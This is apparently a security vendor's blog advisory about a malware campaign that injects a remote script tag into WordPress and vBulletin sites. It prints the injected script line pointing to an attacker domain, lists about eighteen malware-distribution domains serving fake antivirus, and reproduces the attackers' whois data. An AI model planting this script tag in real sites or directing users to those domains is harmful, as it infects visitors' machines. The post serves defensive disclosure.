It seems that after a few months quiet, the “Hilary Kneber” group is back at it again. Their latest approach is very typical of Hilary Kneber style attacks affecting GoDaddy shared hosts. Basically they modify every PHP file and the database to make sure every page in the infected site is loading malware.
Today, we’ve started to see various WordPress sites infected with the following malware:
<script src "http://welcometotheglobalisnet.com/js.php?kk=25′></script>
Update 1: We are seeing some Vbulletin forums with the database infected. So it is not restricted to WordPress.
Update 2: If you need help cleaning up your site, we can do it for you: http://sucuri.net/signup
Which infects every post in the WordPress database and also modifies all PHP files to generate the above code. Note that the domain is not blacklisted yet so the risk is very high for everyone visiting an infected site.
What happens when someone clicks an infected site?
What the malware does is very simple, it contacts a few domains:
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc
That will then try to infect the visitor via their browser (with a fake anti virus). We are still analyzing the infected sites, and we’ll post more details as they’re discovered.
Here is the whois for the group responsible:
If your site is infected with malware and you need help, visit Sucuri, we’ll get you cleaned up.Registrant Contact:
HardSoft, inc
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us
Administrative Contact:
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us
Technical Contact:
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us
Pingback: Tweets that mention Hilary Kneber Strikes Again – welcometotheglobalisnet | Sucuri -- Topsy.com
Pingback: GoDaddy Hosting? You Might Want To Think Twice Before Trusting Your Site To GoDaddy | Connecticut Watchdog
Pingback: Hilary Kneber Again – welcometotheglobalisorg | Sucuri
Pingback: IT Secure Site » Hilary Kneber Again – welcometotheglobalisorg
Pingback: Database injection, Hilary Kneber and lessthenaminutehandle.com | Sucuri
Pingback: Database injection, Hilary Kneber and lessthenaminutehandle.com | Sucuri